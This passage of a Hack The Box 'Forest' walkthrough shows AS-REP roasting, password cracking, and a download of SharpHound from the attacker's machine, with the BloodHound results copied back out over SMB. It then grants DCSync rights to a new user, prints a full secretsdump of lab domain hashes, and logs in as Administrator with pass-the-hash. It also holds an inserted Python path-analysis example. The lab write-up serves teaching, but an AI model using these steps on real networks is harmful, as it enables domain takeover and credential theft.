svc-alfresco
andy
mark
santi
Nice. Done.
┌──(root㉿kali)-[/home/kali/Desktop/work]
└─# GetNPUsers.py htb.local/ -usersfile Usernames.txt -no-pass -format john -outputfile hashes.txt
Impacket v0.12.0.dev1+20231114.165227.4b56c18a - Copyright 2023 Fortra
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User HealthMailboxc3d7722 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailboxfc9daad doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailboxc0a90c9 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox670628e doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox968e74d doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox6ded678 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox83d6781 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailboxfd87238 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailboxb01ac64 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox7108a4e doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox0659cc1 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$svc-alfresco@HTB.LOCAL:cbd577ae0861f45dd45cf18f0d9d5c87$bb392348e764c3a49420641f9db50845ff0422761d3d4290f3d2de50e950b650686cdbdccaa43d76d506349379406b529136ac8ad8a3ebfe6089f7b5e8095691d560b6ebd1ff5783e13e720981110aac2cc38deedb8a1d7421f8ee5c3cb5ecd0ef4a0c64d6210d709468d0796936f41218c8f02d044491d2613bda35f60e9ccb150c4df5cbfc8b7d53d73c14262b716d69f7dc3aa250e6a05808d19359af37b36f511345d262745b4dd80cfbf6d0173d08b1ced3e3543dac057cbd5b7242ad9b5c8b719430e3581e3080e55b4122a0c96cbbd4c1a2aa9359c25c431c95701ce5cf194e63d9d2
[-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User santi doesn't have UF_DONT_REQUIRE_PREAUTH set
We obtained the hash of the user svc-alfresco.
┌──(root㉿kali)-[/home/kali/Desktop/work]
└─# cat hashes.txt
$krb5asrep$23$svc-alfresco@HTB.LOCAL:cbd577ae0861f45dd45cf18f0d9d5c87$bb392348e764c3a49420641f9db50845ff0422761d3d4290f3d2de50e950b650686cdbdccaa43d76d506349379406b529136ac8ad8a3ebfe6089f7b5e8095691d560b6ebd1ff5783e13e720981110aac2cc38deedb8a1d7421f8ee5c3cb5ecd0ef4a0c64d6210d709468d0796936f41218c8f02d044491d2613bda35f60e9ccb150c4df5cbfc8b7d53d73c14262b716d69f7dc3aa250e6a05808d19359af37b36f511345d262745b4dd80cfbf6d0173d08b1ced3e3543dac057cbd5b7242ad9b5c8b719430e3581e3080e55b4122a0c96cbbd4c1a2aa9359c25c431c95701ce5cf194e63d9d2
Brute force Attack
Crack the password with John the Ripper or Hashcat.
I am more used to John the Ripper, so I'll use John, but either is fine.
If you don't have a wordlist, get one from here.
Brute force Attack !!
┌──(root㉿kali)-[/home/kali/Desktop/work]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 ASIMD 4x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
s3rvice ($krb5asrep$23$svc-alfresco@HTB.LOCAL)
1g 0:00:00:06 DONE (2024-01-06 17:56) 0.1517g/s 620304p/s 620304c/s 620304C/s s521379846..s2698813
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
So the user is svc-alfresco and the password is s3rvice.
Let's try actually connecting with winrm.
What is WinRM?
Short for Windows Remote Management: a protocol and service for remote management of Microsoft Windows systems. With it, you can connect to a Windows machine remotely, run commands, and change settings.
The connection succeeded.
┌──(root㉿kali)-[/home/kali/Desktop/work]
└─# evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> whoami
htb\svc-alfresco
Let's explore.
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> dir
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> cd ..
*Evil-WinRM* PS C:\Users\svc-alfresco> dir
Directory: C:\Users\svc-alfresco
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 9/23/2019 2:16 PM Desktop
d-r--- 9/22/2019 4:02 PM Documents
d-r--- 7/16/2016 6:18 AM Downloads
d-r--- 7/16/2016 6:18 AM Favorites
d-r--- 7/16/2016 6:18 AM Links
d-r--- 7/16/2016 6:18 AM Music
d-r--- 7/16/2016 6:18 AM Pictures
d----- 7/16/2016 6:18 AM Saved Games
d-r--- 7/16/2016 6:18 AM Videos
*Evil-WinRM* PS C:\Users\svc-alfresco> cd Desktop
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> dir
Directory: C:\Users\svc-alfresco\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 1/5/2024 9:53 PM 34 user.txt
Found user.txt!
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> type user.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX // 32-character user flag
Privilege Escalation
We aim for privilege escalation to get the root flag.
SharpHound
We want to use BloodHound, so we'll use SharpHound, which collects the data BloodHound needs.
What is BloodHound?
BloodHound is a tool that visualizes privileged access and privilege escalation paths in an Active Directory environment as a graph.
SharpHound lives inside the BloodHound repository (/BloodHound/Collectors), so get it with git clone or similar.
Kali to Target Machine
We want to send SharpHound to the target machine, so let's start a web server on Kali.
┌──(root㉿kali)-[/home/kali/Desktop/work]
└─# python3 -m http.server 80 --bind=10.10.14.4
Run Invoke-WebRequest on the target machine to fetch it.
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Invoke-WebRequest -Uri http://10.10.14.4/SharpHound.exe -UseBasicParsing -OutFile SharpHound.exe
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> dir
Directory: C:\Users\svc-alfresco\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 1/6/2024 5:09 AM 1046528 SharpHound.exe
Run SharpHound!
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> .\SharpHound.exe
2024-01-06T05:17:17.1597131-08:00|INFORMATION|This version of SharpHound is compatible with the 4.3.1 Release of BloodHound
2024-01-06T05:17:17.3003471-08:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-01-06T05:17:17.3315902-08:00|INFORMATION|Initializing SharpHound at 5:17 AM on 1/6/2024
2024-01-06T05:17:17.6597265-08:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for htb.local : FOREST.htb.local
2024-01-06T05:17:17.7847127-08:00|INFORMATION|Flags: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-01-06T05:17:18.1440886-08:00|INFORMATION|Beginning LDAP search for htb.local
2024-01-06T05:17:18.2222151-08:00|INFORMATION|Producer has finished, closing LDAP channel
2024-01-06T05:17:18.2222151-08:00|INFORMATION|LDAP channel closed, waiting for consumers
2024-01-06T05:17:48.3942902-08:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 40 MB RAM
2024-01-06T05:18:01.5191814-08:00|INFORMATION|Consumers finished, closing output channel
2024-01-06T05:18:01.5504290-08:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2024-01-06T05:18:01.6598031-08:00|INFORMATION|Status: 161 objects finished (+161 3.744186)/s -- Using 48 MB RAM
2024-01-06T05:18:01.6754272-08:00|INFORMATION|Enumeration finished in 00:00:43.5327262
2024-01-06T05:18:01.7535544-08:00|INFORMATION|Saving cache with stats: 118 ID to type mappings.
117 name to SID mappings.
0 machine sid mappings.
2 sid to domain mappings.
0 global catalog mappings.
2024-01-06T05:18:01.7535544-08:00|INFORMATION|SharpHound Enumeration Completed at 5:18 AM on 1/6/2024! Happy Graphing!
Running it produces a BloodHound zip file. Now send this back to Kali.
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> dir
Directory: C:\Users\svc-alfresco\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 1/6/2024 5:18 AM 18689 20240106051800_BloodHound.zip
-a---- 1/6/2024 5:18 AM 19538 MzZhZTZmYjktOTM4NS00NDQ3LTk3OGItMmEyYTVjZjNiYTYw.bin
-a---- 1/6/2024 5:09 AM 1046528 SharpHound.exe
Target Machine to Kali
Start an SMB server on Kali using smbserver.py.
┌──(root㉿kali)-[/home/kali/Desktop/work]
└─# python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali /home/kali/Desktop/work
Impacket v0.12.0.dev1+20231114.165227.4b56c18a - Copyright 2023 Fortra
Send it from the target machine.
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Copy-Item -Path .\20240106051800_BloodHound.zip -Destination \\10.10.14.4\kali
Got it.
┌──(root㉿kali)-[/home/kali/Desktop/work]
└─# ls -lta
total 6352
drwxr-xr-x 7 kali kali 4096 Jan 7 18:05 .
-rwxr-xr-x 1 root root 18689 Jan 6 22:18 20240106051800_BloodHound.zip
-rw-r--r-- 1 root root 1046528 Jan 6 21:39 SharpHound.exe
drwxr-xr-x 7 root root 4096 Jan 6 21:37 BloodHound
-rw-r--r-- 1 root root 531 Jan 6 17:42 hashes.txt
-rw-r--r-- 1 root root 530 Jan 6 17:28 Usernames.txt
-rw-r--r-- 1 root root 1119 Jan 6 17:09 users.txt
drwxr-xr-x 3 kali kali 4096 Jan 5 11:51 ..
BloodHound
Let's use BloodHound. It needs a fair amount of setup, so refer to this.
Typing the bloodhound command brings up a screen like this.
Drag and drop the zip file from earlier, then search for svc-alfresco.
The user shows up. Since we have already compromised this user, mark it with Mark User as Owned.
Analysis
Let's look at the paths, analyze them, and think about an attack method.
Paths can be viewed through various analysis options, so try them out.
Find Shortest Path to Domain Admins
Shortest Path to Domain Admins from Owned Principals
Shortest Path From Owned Principals
Analysis Outcome
The analysis revealed the following.
① svc-alfresco belongs to Service Accounts.
② Service Accounts is a member of Privileged IT Accounts.
③ Privileged IT Accounts is a member of Account Operators.
④ Account Operators has GenericAll permission over Exchange Windows Permissions.
GenericAll is a permission that grants broad access rights.
It allows write access to all properties of the object, including the ability to add users to a group and reset user passwords.
It's the "strongest" permission!
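The nested-membership chain above is what BloodHound computes as a path. As an added example (not part of the write-up or of BloodHound itself), the snippet below rebuilds the same edges from constructed data and walks them, both from the attacker's side (shortest path from the owned user to the domain) and from the defender's side (which users transitively reach a privileged object). The WriteDacl edge from Exchange Windows Permissions to the domain object is an assumption used to explain why the later DCSync grant works; the user sebastien is a constructed control case.

```python
from collections import deque

# Constructed edges mirroring the relationships BloodHound displayed for htb.local.
# Each edge is (source, relation, target). MemberOf is group nesting; the others are ACL rights.
# The WriteDacl edge from Exchange Windows Permissions to the domain is an assumption
# that explains why granting DCSync rights on the domain succeeded later in the write-up.
EDGES = [
    ("svc-alfresco", "MemberOf", "Service Accounts"),
    ("Service Accounts", "MemberOf", "Privileged IT Accounts"),
    ("Privileged IT Accounts", "MemberOf", "Account Operators"),
    ("Account Operators", "GenericAll", "Exchange Windows Permissions"),
    ("Exchange Windows Permissions", "WriteDacl", "htb.local"),
    ("sebastien", "MemberOf", "Domain Users"),  # constructed: a user with no privileged path
]

def build_graph(edges):
    """Adjacency map: node -> list of (relation, neighbour)."""
    graph = {}
    for src, rel, dst in edges:
        graph.setdefault(src, []).append((rel, dst))
        graph.setdefault(dst, [])
    return graph

def effective_groups(graph, principal):
    """Transitive closure of MemberOf: every group the principal is in, directly or by nesting."""
    seen, stack = set(), [principal]
    while stack:
        node = stack.pop()
        for rel, nxt in graph.get(node, []):
            if rel == "MemberOf" and nxt not in seen:
                seen.add(nxt)
                stack.append(nxt)
    return seen

def shortest_path(graph, start, target):
    """BFS over all edge types; returns the hop list [(src, relation, dst), ...] or None."""
    prev = {start: None}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        if node == target:
            path = []
            while prev[node] is not None:
                src, rel = prev[node]
                path.append((src, rel, node))
                node = src
            return path[::-1]
        for rel, nxt in graph.get(node, []):
            if nxt not in prev:
                prev[nxt] = (node, rel)
                queue.append(nxt)
    return None

def users_reaching(graph, target, users):
    """Defender view: which of the given users have any path at all to the target object."""
    return sorted(u for u in users if shortest_path(graph, u, target) is not None)
```

On a real domain the edge list would come from the SharpHound JSON export rather than being typed in; the audit question stays the same: any non-admin user appearing in users_reaching for the domain object is a finding.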
Attacking Scenario
From these findings we can build an attack scenario.
① Use the Account Operators privilege to create a new user.
② Add the created user to Exchange Windows Permissions.
③ Also add it to Remote Management Users to gain remote access.
④ DCSync Attack!
Let's start with ①.
Before that, I want to use PowerView, so send it over.
Download it into the same directory the web server is serving.
Send it over using the same procedure described earlier in Kali to Target Machine.
Load it with this command.
Import-Module .\PowerView.ps1
- Use the Account Operators privilege to create a new user -
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> New-ADUser -Name "GenkaiChan" -SamAccountName "GenkaiChan" -AccountPassword (ConvertTo-SecureString "GenkaiChan" -AsPlainText -Force) -Enabled $true
- Add the created user to Exchange Windows Permissions -
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Add-ADGroupMember -Identity "Exchange Windows Permissions" -Members "GenkaiChan"
- Also add it to Remote Management Users to gain remote access -
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Add-ADGroupMember -Identity "Remote Management Users" -Members "GenkaiChan"
Connected successfully as GenkaiChan.
┌──(root㉿kali)-[/home/kali/Desktop/work]
└─# evil-winrm -i 10.10.10.161 -u GenkaiChan -p GenkaiChan
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\GenkaiChan\Documents>
It has the expected group memberships too.
*Evil-WinRM* PS C:\Users\GenkaiChan\Documents> Get-ADPrincipalGroupMembership -Identity GenkaiChan | Select-Object Name
Name
----
Domain Users
Remote Management Users
Exchange Windows Permissions
DCSync Attack
What is a DCSync attack?
A DCSync attack is a technique for obtaining hashes and credentials from Active Directory. With it, an attacker can retrieve the NTLM hash of a given user account from an Active Directory domain controller.
Let's get right to it.
Grant DCSync rights to the user we just created.
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Add-ObjectACL -PrincipalIdentity GenkaiChan -Rights DCSync
I tried exploiting with Mimikatz but it failed, so this time I'll attack from the Kali side.
This is what we'll use.
┌──(root㉿kali)-[/home/…/Desktop/work/impacket/examples]
└─# python3 secretsdump.py htb/GenkaiChan:GenkaiChan@10.10.10.161
Impacket v0.12.0.dev1+20231114.165227.4b56c18a - Copyright 2023 Fortra
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_2c8eef0a09b545acb:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_ca8c2ed5bdab4dc9b:1125:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_75a538d3025e4db9a:1126:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_681f53d4942840e18:1127:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_1b41c9286325456bb:1128:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_9b69f1b9d2cc45549:1129:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_7c96b981967141ebb:1130:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_c75ee099d0a64c91b:1131:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_1ffab36a2f5f479cb:1132:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\HealthMailboxc3d7722:1134:aad3b435b51404eeaad3b435b51404ee:4761b9904a3d88c9c9341ed081b4ec6f:::
htb.local\HealthMailboxfc9daad:1135:aad3b435b51404eeaad3b435b51404ee:5e89fd2c745d7de396a0152f0e130f44:::
htb.local\HealthMailboxc0a90c9:1136:aad3b435b51404eeaad3b435b51404ee:3b4ca7bcda9485fa39616888b9d43f05:::
htb.local\HealthMailbox670628e:1137:aad3b435b51404eeaad3b435b51404ee:e364467872c4b4d1aad555a9e62bc88a:::
htb.local\HealthMailbox968e74d:1138:aad3b435b51404eeaad3b435b51404ee:ca4f125b226a0adb0a4b1b39b7cd63a9:::
htb.local\HealthMailbox6ded678:1139:aad3b435b51404eeaad3b435b51404ee:c5b934f77c3424195ed0adfaae47f555:::
htb.local\HealthMailbox83d6781:1140:aad3b435b51404eeaad3b435b51404ee:9e8b2242038d28f141cc47ef932ccdf5:::
htb.local\HealthMailboxfd87238:1141:aad3b435b51404eeaad3b435b51404ee:f2fa616eae0d0546fc43b768f7c9eeff:::
htb.local\HealthMailboxb01ac64:1142:aad3b435b51404eeaad3b435b51404ee:0d17cfde47abc8cc3c58dc2154657203:::
htb.local\HealthMailbox7108a4e:1143:aad3b435b51404eeaad3b435b51404ee:d7baeec71c5108ff181eb9ba9b60c355:::
htb.local\HealthMailbox0659cc1:1144:aad3b435b51404eeaad3b435b51404ee:900a4884e1ed00dd6e36872859c03536:::
htb.local\sebastien:1145:aad3b435b51404eeaad3b435b51404ee:96246d980e3a8ceacbf9069173fa06fc:::
htb.local\lucinda:1146:aad3b435b51404eeaad3b435b51404ee:4c2af4b2cd8a15b1ebd0ef6c58b879c3:::
htb.local\svc-alfresco:1147:aad3b435b51404eeaad3b435b51404ee:9248997e4ef68ca2bb47ae4e6f128668:::
htb.local\andy:1150:aad3b435b51404eeaad3b435b51404ee:29dfccaf39618ff101de5165b19d524b:::
htb.local\mark:1151:aad3b435b51404eeaad3b435b51404ee:9e63ebcb217bf3c6b27056fdcb6150f7:::
htb.local\santi:1152:aad3b435b51404eeaad3b435b51404ee:483d4c70248510d8e0acb6066cd89072:::
GenkaiChan:9601:aad3b435b51404eeaad3b435b51404ee:79212aed4ff5fdb3c8af2306e4d2229d:::
FOREST$:1000:aad3b435b51404eeaad3b435b51404ee:8f694fce6f200771263f76f2f3dabd28:::
EXCH01$:1103:aad3b435b51404eeaad3b435b51404ee:050105bb043f5b8ffc3a9fa99b5ef7c1:::
[*] Kerberos keys grabbed
htb.local\Administrator:aes256-cts-hmac-sha1-96:910e4c922b7516d4a27f05b5ae6a147578564284fff8461a02298ac9263bc913
htb.local\Administrator:aes128-cts-hmac-sha1-96:b5880b186249a067a5f6b814a23ed375
htb.local\Administrator:des-cbc-md5:c1e049c71f57343b
krbtgt:aes256-cts-hmac-sha1-96:9bf3b92c73e03eb58f698484c38039ab818ed76b4b3a0e1863d27a631f89528b
krbtgt:aes128-cts-hmac-sha1-96:13a5c6b1d30320624570f65b5f755f58
krbtgt:des-cbc-md5:9dd5647a31518ca8
htb.local\HealthMailboxc3d7722:aes256-cts-hmac-sha1-96:258c91eed3f684ee002bcad834950f475b5a3f61b7aa8651c9d79911e16cdbd4
htb.local\HealthMailboxc3d7722:aes128-cts-hmac-sha1-96:47138a74b2f01f1886617cc53185864e
htb.local\HealthMailboxc3d7722:des-cbc-md5:5dea94ef1c15c43e
htb.local\HealthMailboxfc9daad:aes256-cts-hmac-sha1-96:6e4efe11b111e368423cba4aaa053a34a14cbf6a716cb89aab9a966d698618bf
htb.local\HealthMailboxfc9daad:aes128-cts-hmac-sha1-96:9943475a1fc13e33e9b6cb2eb7158bdd
htb.local\HealthMailboxfc9daad:des-cbc-md5:7c8f0b6802e0236e
htb.local\HealthMailboxc0a90c9:aes256-cts-hmac-sha1-96:7ff6b5acb576598fc724a561209c0bf541299bac6044ee214c32345e0435225e
htb.local\HealthMailboxc0a90c9:aes128-cts-hmac-sha1-96:ba4a1a62fc574d76949a8941075c43ed
htb.local\HealthMailboxc0a90c9:des-cbc-md5:0bc8463273fed983
htb.local\HealthMailbox670628e:aes256-cts-hmac-sha1-96:a4c5f690603ff75faae7774a7cc99c0518fb5ad4425eebea19501517db4d7a91
htb.local\HealthMailbox670628e:aes128-cts-hmac-sha1-96:b723447e34a427833c1a321668c9f53f
htb.local\HealthMailbox670628e:des-cbc-md5:9bba8abad9b0d01a
htb.local\HealthMailbox968e74d:aes256-cts-hmac-sha1-96:1ea10e3661b3b4390e57de350043a2fe6a55dbe0902b31d2c194d2ceff76c23c
htb.local\HealthMailbox968e74d:aes128-cts-hmac-sha1-96:ffe29cd2a68333d29b929e32bf18a8c8
htb.local\HealthMailbox968e74d:des-cbc-md5:68d5ae202af71c5d
htb.local\HealthMailbox6ded678:aes256-cts-hmac-sha1-96:d1a475c7c77aa589e156bc3d2d92264a255f904d32ebbd79e0aa68608796ab81
htb.local\HealthMailbox6ded678:aes128-cts-hmac-sha1-96:bbe21bfc470a82c056b23c4807b54cb6
htb.local\HealthMailbox6ded678:des-cbc-md5:cbe9ce9d522c54d5
htb.local\HealthMailbox83d6781:aes256-cts-hmac-sha1-96:d8bcd237595b104a41938cb0cdc77fc729477a69e4318b1bd87d99c38c31b88a
htb.local\HealthMailbox83d6781:aes128-cts-hmac-sha1-96:76dd3c944b08963e84ac29c95fb182b2
htb.local\HealthMailbox83d6781:des-cbc-md5:8f43d073d0e9ec29
htb.local\HealthMailboxfd87238:aes256-cts-hmac-sha1-96:9d05d4ed052c5ac8a4de5b34dc63e1659088eaf8c6b1650214a7445eb22b48e7
htb.local\HealthMailboxfd87238:aes128-cts-hmac-sha1-96:e507932166ad40c035f01193c8279538
htb.local\HealthMailboxfd87238:des-cbc-md5:0bc8abe526753702
htb.local\HealthMailboxb01ac64:aes256-cts-hmac-sha1-96:af4bbcd26c2cdd1c6d0c9357361610b79cdcb1f334573ad63b1e3457ddb7d352
htb.local\HealthMailboxb01ac64:aes128-cts-hmac-sha1-96:8f9484722653f5f6f88b0703ec09074d
htb.local\HealthMailboxb01ac64:des-cbc-md5:97a13b7c7f40f701
htb.local\HealthMailbox7108a4e:aes256-cts-hmac-sha1-96:64aeffda174c5dba9a41d465460e2d90aeb9dd2fa511e96b747e9cf9742c75bd
htb.local\HealthMailbox7108a4e:aes128-cts-hmac-sha1-96:98a0734ba6ef3e6581907151b96e9f36
htb.local\HealthMailbox7108a4e:des-cbc-md5:a7ce0446ce31aefb
htb.local\HealthMailbox0659cc1:aes256-cts-hmac-sha1-96:a5a6e4e0ddbc02485d6c83a4fe4de4738409d6a8f9a5d763d69dcef633cbd40c
htb.local\HealthMailbox0659cc1:aes128-cts-hmac-sha1-96:8e6977e972dfc154f0ea50e2fd52bfa3
htb.local\HealthMailbox0659cc1:des-cbc-md5:e35b497a13628054
htb.local\sebastien:aes256-cts-hmac-sha1-96:fa87efc1dcc0204efb0870cf5af01ddbb00aefed27a1bf80464e77566b543161
htb.local\sebastien:aes128-cts-hmac-sha1-96:18574c6ae9e20c558821179a107c943a
htb.local\sebastien:des-cbc-md5:702a3445e0d65b58
htb.local\lucinda:aes256-cts-hmac-sha1-96:acd2f13c2bf8c8fca7bf036e59c1f1fefb6d087dbb97ff0428ab0972011067d5
htb.local\lucinda:aes128-cts-hmac-sha1-96:fc50c737058b2dcc4311b245ed0b2fad
htb.local\lucinda:des-cbc-md5:a13bb56bd043a2ce
htb.local\svc-alfresco:aes256-cts-hmac-sha1-96:46c50e6cc9376c2c1738d342ed813a7ffc4f42817e2e37d7b5bd426726782f32
htb.local\svc-alfresco:aes128-cts-hmac-sha1-96:e40b14320b9af95742f9799f45f2f2ea
htb.local\svc-alfresco:des-cbc-md5:014ac86d0b98294a
htb.local\andy:aes256-cts-hmac-sha1-96:ca2c2bb033cb703182af74e45a1c7780858bcbff1406a6be2de63b01aa3de94f
htb.local\andy:aes128-cts-hmac-sha1-96:606007308c9987fb10347729ebe18ff6
htb.local\andy:des-cbc-md5:a2ab5eef017fb9da
htb.local\mark:aes256-cts-hmac-sha1-96:9d306f169888c71fa26f692a756b4113bf2f0b6c666a99095aa86f7c607345f6
htb.local\mark:aes128-cts-hmac-sha1-96:a2883fccedb4cf688c4d6f608ddf0b81
htb.local\mark:des-cbc-md5:b5dff1f40b8f3be9
htb.local\santi:aes256-cts-hmac-sha1-96:8a0b0b2a61e9189cd97dd1d9042e80abe274814b5ff2f15878afe46234fb1427
htb.local\santi:aes128-cts-hmac-sha1-96:cbf9c843a3d9b718952898bdcce60c25
htb.local\santi:des-cbc-md5:4075ad528ab9e5fd
GenkaiChan:aes256-cts-hmac-sha1-96:56c9d9c5f0ab76986330c5dd77d7dbd50392c2134d40c8934859a04b6de1f7d2
GenkaiChan:aes128-cts-hmac-sha1-96:a50ec83ebbc5a82e9f11787cd45dd23f
GenkaiChan:des-cbc-md5:5b733e49f84f85a2
FOREST$:aes256-cts-hmac-sha1-96:2d4238ad5acaf79efe019a2e768d9788c29f5dcb56570cbac0b57fbd8eb45744
FOREST$:aes128-cts-hmac-sha1-96:4366f3c8087e17e8dfd3faf64636c069
FOREST$:des-cbc-md5:896457320eae0bba
EXCH01$:aes256-cts-hmac-sha1-96:1a87f882a1ab851ce15a5e1f48005de99995f2da482837d49f16806099dd85b6
EXCH01$:aes128-cts-hmac-sha1-96:9ceffb340a70b055304c3cd0583edf4e
EXCH01$:des-cbc-md5:8c45f44c16975129
[*] Cleaning up...
Look here.
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
We successfully obtained the username and hash.
Pass the Hash Attack
┌──(root㉿kali)-[/home/kali/Desktop/work]
└─# evil-winrm -i 10.10.10.161 -u administrator -H 32693b11e6aa90eb43d32c72a07ceea6
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
Looks like it worked.
*Evil-WinRM* PS C:\Users\Administrator\Documents> dir
Directory: C:\Users\Administrator\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 9/23/2019 3:46 PM 770279 PowerView.ps1
-ar--- 10/6/2019 12:46 PM 664 revert.ps1
-ar--- 9/23/2019 3:05 PM 51 users.txt
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> dir
Directory: C:\Users\Administrator
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 9/20/2019 4:04 PM Contacts
d-r--- 9/23/2019 2:15 PM Desktop
d-r--- 9/23/2019 3:46 PM Documents
d-r--- 9/20/2019 4:04 PM Downloads
